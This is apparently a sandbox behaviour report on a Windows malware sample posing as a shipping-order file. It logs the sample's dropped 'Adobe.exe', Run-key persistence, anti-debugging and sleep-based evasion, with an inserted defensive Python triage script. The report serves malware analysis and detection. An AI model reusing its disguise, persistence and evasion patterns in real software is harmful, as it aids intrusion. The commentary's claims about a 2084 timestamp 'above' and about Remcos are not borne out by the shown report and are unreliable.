                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,3_2_0041BCE3
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 0_2_02BBEFB0 push esp; iretd 0_2_02BBEFB1
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_004567E0 push eax; ret 3_2_004567FE
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0045B9DD push esi; ret 3_2_0045B9E6
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00463EF3 push ds; retf 3_2_00463EEC
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00455EAF push ecx; ret 3_2_00455EC2
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00433FF6 push ecx; ret 3_2_00434009
                    Source: C:\ProgramData\Adobe\Adobe.exeCode function: 4_2_0094EFB0 push esp; iretd 4_2_0094EFB1
                    Source: C:\ProgramData\Adobe\Adobe.exeCode function: 8_2_02D2EFB0 push esp; iretd 8_2_02D2EFB1
                    Source: C:\ProgramData\Adobe\Adobe.exeCode function: 11_2_00B9EFB0 push esp; iretd 11_2_00B9EFB1
                    Source: C:\ProgramData\Adobe\Adobe.exeCode function: 13_2_0151EFB0 push esp; iretd 13_2_0151EFB1
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeStatic PE information: section name: .text entropy: 7.871355192949315
                    Source: Adobe.exe.3.drStatic PE information: section name: .text entropy: 7.871355192949315
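Two of the static observations above are the classic first-pass packer indicators: a link timestamp of 0xD7610664, which decodes to July 2084, so it cannot be a real build time, and a .text section at 7.87 bits per byte, identical in the submitted file and the dropped Adobe.exe (compiled code normally sits well under 7). The Python below is an added triage example, not part of the Joe Sandbox report or of the sample: it reads IMAGE_FILE_HEADER.TimeDateStamp directly from the PE header, computes Shannon entropy for a section, and applies both checks. The PE image it checks is a constructed minimal header (DOS header, PE signature, COFF header) carrying the report's timestamp; the .text bytes stand in for the real section, which the report does not reproduce.

```python
"""Added triage example (not from the Joe Sandbox report or the sample): two
static packer indicators, a PE TimeDateStamp in the future and a near-random
.text section, checked against a constructed minimal PE image."""
import math
import struct
from collections import Counter
from datetime import datetime, timezone
from typing import Optional

PACKED_ENTROPY_THRESHOLD = 7.0   # bits/byte; native and .NET code usually sits around 5.5-6.5


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant buffer, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def looks_packed(section: bytes, threshold: float = PACKED_ENTROPY_THRESHOLD) -> bool:
    """A code section this close to 8.0 is compressed or encrypted, not compiled code."""
    return shannon_entropy(section) >= threshold


def pe_timestamp(image: bytes) -> int:
    """Return IMAGE_FILE_HEADER.TimeDateStamp (seconds since 1970-01-01 UTC)."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    # COFF header follows the signature: Machine(2) NumberOfSections(2) TimeDateStamp(4) ...
    return struct.unpack_from("<I", image, e_lfanew + 8)[0]


def pe_timestamp_utc(image: bytes) -> datetime:
    return datetime.fromtimestamp(pe_timestamp(image), tz=timezone.utc)


def timestamp_is_suspicious(ts: int, now: Optional[datetime] = None) -> bool:
    """Flag a build time after the analysis time (impossible) or before 2000 (a zeroed or stomped header)."""
    now = now or datetime.now(tz=timezone.utc)
    built = datetime.fromtimestamp(ts, tz=timezone.utc)
    return built > now or built.year < 2000


def build_minimal_pe(timestamp: int) -> bytes:
    """Constructed sample input: DOS header + PE signature + COFF header, nothing more (hypothetical image)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE signature right after the DOS header
    coff = struct.pack("<HHIIIHH",
                       0x014C,      # Machine: i386 (a 32-bit image, like the report's sample)
                       1,           # NumberOfSections
                       timestamp,   # TimeDateStamp
                       0, 0,        # PointerToSymbolTable, NumberOfSymbols
                       0xE0,        # SizeOfOptionalHeader (PE32)
                       0x0102)      # Characteristics: EXECUTABLE_IMAGE | 32BIT_MACHINE
    return bytes(dos) + b"PE\0\0" + coff


def triage(image: bytes, text_section: bytes, now: Optional[datetime] = None) -> dict:
    """Combine both checks the way a first-pass static triage would."""
    ts = pe_timestamp(image)
    ent = shannon_entropy(text_section)
    return {
        "timestamp": ts,
        "compile_time_utc": datetime.fromtimestamp(ts, tz=timezone.utc).isoformat(),
        "timestamp_suspicious": timestamp_is_suspicious(ts, now),
        "text_entropy": round(ent, 3),
        "likely_packed": ent >= PACKED_ENTROPY_THRESHOLD,
    }


if __name__ == "__main__":
    # The report's TimeDateStamp 0xD7610664 decodes to 2084-07-03 10:54:28 UTC. The real
    # .text bytes are not in the report, so a uniform byte pattern (entropy 8.0) stands in.
    sample_image = build_minimal_pe(0xD7610664)
    fake_text = bytes(range(256)) * 16
    print(triage(sample_image, fake_text))
```

The entropy threshold is a heuristic, not a proof: a large embedded compressed resource can push a benign binary over 7.0, so treat a hit as a reason to unpack and look at what the stub decrypts, which in this report is the Remcos payload the .NET loader carries.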

                    Persistence and Installation Behavior

Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | File written: C:\ProgramData\Adobe\Adobe.exe
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: 3_2_00406128 ShellExecuteW,URLDownloadToFileW, 3_2_00406128
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | File created: \#u4f73#u5ddd#u7acb 20241202 kaohsiung-manila north port 1x20' so.scr.exe (reported 4 times)
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | File created: C:\ProgramData\Adobe\Adobe.exe (dropped file)

                    Boot Survival

                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Adobe_Nov-3XE9WNJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,3_2_00419BC4
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Adobe_Nov-3XE9WNJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Adobe_Nov-3XE9WNJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Adobe_Nov-3XE9WNJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Adobe_Nov-3XE9WNJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,3_2_0041BCE3
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\ProgramData\Adobe\Adobe.exe | Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match | File source: Process Memory Space: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe PID: 3668, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: 3_2_0040E54F Sleep,ExitProcess,3_2_0040E54F
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Memory allocated: 2B10000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Memory allocated: 2D70000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Memory allocated: 8F90000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Memory allocated: 9F90000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Memory allocated: A1A0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Memory allocated: B1A0000 memory reserve | memory write watch
                    Source: C:\ProgramData\Adobe\Adobe.exe | Memory allocated: 940000 memory reserve | memory write watch
                    Source: C:\ProgramData\Adobe\Adobe.exe | Memory allocated: 2490000 memory reserve | memory write watch
                    Source: C:\ProgramData\Adobe\Adobe.exe | Memory allocated: 4490000 memory reserve | memory write watch
                    Source: C:\ProgramData\Adobe\Adobe.exe | Memory allocated: 81A0000 memory reserve | memory write watch
                    Source: C:\ProgramData\Adobe\Adobe.exe | Memory allocated: 91A0000 memory reserve | memory write watch
                    Source: C:\ProgramData\Adobe\Adobe.exe | Memory allocated: 9390000 memory reserve | memory write watch
                    Source: C:\ProgramData\Adobe\Adobe.exe | Memory allocated: A390000 memory reserve | memory write watch
                    Source: C:\ProgramData\Adobe\Adobe.exe | Memory allocated: 2D00000 memory reserve | memory write watch
                    Source: C:\ProgramData\Adobe\Adobe.exe | Memory allocated: 2EA0000 memory reserve | memory write watch
                    Source: C:\ProgramData\Adobe\Adobe.exe | Memory allocated: 4EA0000 memory reserve | memory write watch
                    Source: C:\ProgramData\Adobe\Adobe.exe | Memory allocated: 8CF0000 memory reserve | memory write watch
                    Source: C:\ProgramData\Adobe\Adobe.exe | Memory allocated: 9CF0000 memory reserve | memory write watch
                    Source: C:\ProgramData\Adobe\Adobe.exe | Memory allocated: 9EF0000 memory reserve | memory write watch
                    Source: C:\ProgramData\Adobe\Adobe.exe | Memory allocated: AEF0000 memory reserve | memory write watch
                    Source: C:\ProgramData\Adobe\Adobe.exe | Memory allocated: B40000 memory reserve | memory write watch
                    Source: C:\ProgramData\Adobe\Adobe.exe | Memory allocated: 27C0000 memory reserve | memory write watch
                    Source: C:\ProgramData\Adobe\Adobe.exe | Memory allocated: 47C0000 memory reserve | memory write watch
                    Source: C:\ProgramData\Adobe\Adobe.exe | Memory allocated: 8970000 memory reserve | memory write watch
                    Source: C:\ProgramData\Adobe\Adobe.exe | Memory allocated: 8290000 memory reserve | memory write watch
                    Source: C:\ProgramData\Adobe\Adobe.exe | Memory allocated: 9970000 memory reserve | memory write watch
                    Source: C:\ProgramData\Adobe\Adobe.exe | Memory allocated: A970000 memory reserve | memory write watch
                    Source: C:\ProgramData\Adobe\Adobe.exe | Memory allocated: 1510000 memory reserve | memory write watch
                    Source: C:\ProgramData\Adobe\Adobe.exe | Memory allocated: 2FA0000 memory reserve | memory write watch
                    Source: C:\ProgramData\Adobe\Adobe.exe | Memory allocated: 2DA0000 memory reserve | memory write watch
                    Source: C:\ProgramData\Adobe\Adobe.exe | Memory allocated: 8EE0000 memory reserve | memory write watch
                    Source: C:\ProgramData\Adobe\Adobe.exe | Memory allocated: 8AD0000 memory reserve | memory write watch
                    Source: C:\ProgramData\Adobe\Adobe.exe | Memory allocated: 9EE0000 memory reserve | memory write watch
                    Source: C:\ProgramData\Adobe\Adobe.exe | Memory allocated: AEE0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,3_2_004198C2
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\ProgramData\Adobe\Adobe.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\ProgramData\Adobe\Adobe.exe | Window / User API: threadDelayed 4500
                    Source: C:\ProgramData\Adobe\Adobe.exe | Window / User API: threadDelayed 5494
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Evaded block: after key decision (graph_3-47790)
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Evaded block: after key decision (graph_3-47767)
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | API coverage: 5.3 %
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe TID: 2436 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\ProgramData\Adobe\Adobe.exe TID: 2228 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\ProgramData\Adobe\Adobe.exe TID: 6036 | Thread sleep count: 4500 > 30
                    Source: C:\ProgramData\Adobe\Adobe.exe TID: 6036 | Thread sleep time: -13500000s >= -30000s
                    Source: C:\ProgramData\Adobe\Adobe.exe TID: 6036 | Thread sleep count: 5494 > 30
                    Source: C:\ProgramData\Adobe\Adobe.exe TID: 6036 | Thread sleep time: -16482000s >= -30000s
                    Source: C:\ProgramData\Adobe\Adobe.exe TID: 3876 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\ProgramData\Adobe\Adobe.exe TID: 2108 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\ProgramData\Adobe\Adobe.exe TID: 4444 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: 3_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,3_2_0040B335
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: 3_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,3_2_0041B42F
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,3_2_0040B53A
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0044D5E9 FindFirstFileExA,3_2_0044D5E9
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,3_2_004089A9
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00406AC2 FindFirstFileW,FindNextFileW,3_2_00406AC2
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,3_2_00407A8C
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,3_2_00418C69
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,3_2_00408DA7
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,3_2_00406F06
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: Adobe.exe, 00000007.00000002.4507004110.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, Adobe.exe, 00000007.00000002.4507004110.0000000000E37000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\ProgramData\Adobe\Adobe.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: 3_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_0043A65D
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: 3_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 3_2_0041BCE3
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: 3_2_00442554 mov eax, dword ptr fs:[00000030h] 3_2_00442554
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: 3_2_0044E92E GetProcessHeap, 3_2_0044E92E
Source: C:\ProgramData\Adobe\Adobe.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: 3_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_00434168
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: 3_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_0043A65D
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: 3_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00433B44
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: 3_2_00433CD7 SetUnhandledExceptionFilter, 3_2_00433CD7
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 3_2_00410F36
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: 3_2_00418754 mouse_event, 3_2_00418754
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Process created: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe "C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe"
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Process created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"
Source: C:\ProgramData\Adobe\Adobe.exe | Process created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"
Source: C:\ProgramData\Adobe\Adobe.exe | Process created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"
Source: C:\ProgramData\Adobe\Adobe.exe | Process created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"
Source: C:\ProgramData\Adobe\Adobe.exe | Process created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"
Source: C:\ProgramData\Adobe\Adobe.exe | Process created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"
Source: C:\ProgramData\Adobe\Adobe.exe | Process created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"
Source: Adobe.exe, 00000007.00000002.4507004110.0000000000E91000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: Adobe.exe, 00000007.00000002.4507004110.0000000000E91000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerW
Source: Adobe.exe, 00000007.00000002.4507004110.0000000000E6F000.00000004.00000020.00020000.00000000.sdmp, Adobe.exe, 00000007.00000002.4507004110.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp, Adobe.exe, 00000007.00000002.4507004110.0000000000E37000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: 3_2_00433E0A cpuid 3_2_00433E0A
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: EnumSystemLocalesW, 3_2_004470AE
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: GetLocaleInfoW, 3_2_004510BA
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 3_2_004511E3
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: GetLocaleInfoW, 3_2_004512EA
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 3_2_004513B7
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: GetLocaleInfoW, 3_2_00447597
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: GetLocaleInfoA, 3_2_0040E679
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 3_2_00450A7F
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: EnumSystemLocalesW, 3_2_00450CF7
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: EnumSystemLocalesW, 3_2_00450D42
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: EnumSystemLocalesW, 3_2_00450DDD
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 3_2_00450E6A
